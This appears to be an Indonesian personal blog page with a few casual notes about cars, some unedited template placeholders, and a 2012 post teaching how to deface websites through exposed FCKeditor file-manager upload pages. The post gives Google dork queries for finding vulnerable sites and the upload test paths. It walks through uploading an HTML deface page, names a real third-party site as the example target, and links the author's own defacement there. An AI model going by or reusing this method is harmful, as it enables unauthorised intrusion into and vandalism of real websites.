This is My cars

biasanya aku naik ini kalo pas berangkat sekolah ke MAN 1 Jember ku yang tercinta

Ini mobilnya adekku

Meskipun Adekku masih keil,tapi dia udah pintar nyetir Mobil lho...

My Favorite Car

Ini dia,Mobil yang paling aku suka.tiap 3 hari skali gue mandiin dan tiap sore gue bawa jalan-jalan di Pasar Tanjung ^_^

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Minggu, 26 Agustus 2012

Deface dengan metode FCKeditor


hmmm,kali ini akyra akan posting tentang deface web dengan metode FCKeditor

 Dorknya:coba2 aja...
- inurl:/editor/editor/filemanager/

- inurl:/HTMLEditor/editor/"
- inurl:/HTMLEditor/editor//filemanager/
- inurl:/HTMLEditor/editor/filemanager/connectors/

Exploit:http://[target.com]/editor/editor/filemanager/upload/test.html
             http://[Target.com]/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html


dork diatas ^ isi kan d google, cari trget...klo dapat

ex: http://www.centerkennedy.com.br/moveiseletro/editor/editor/filemanager/

inject kn exploit ny d atas....
jdinya.......
ex : http://www.centerkennedy.com.br/moveiseletro/editor/editor/filemanager/upload/test.html

pada [Select the "File Uploader" to use: ] <----- pilih PHP

terus upload html kmu.....
klik send it to server, kalo sukses or terupload maka pada kotak [Uploaded File URL:] akan memberikan patch dimana file kamu terupload

ex : yang keluar pada kotak [Uploaded File URL:] : /UserFiles/html_kamu.html

maka hasil nya ada di http://[target.com]/editor/html_kamu.html
mudah kn....hehehehehe
nih,hasil pepes ane :D
http://www.centerkennedy.com.br/editor/images/anon_knight.html

sumber : Hacker Indonesia

simple

simple

tam hu

free counters
DON'T FORGET FOLLOW ME AND LEAVE YOUR COMMENT!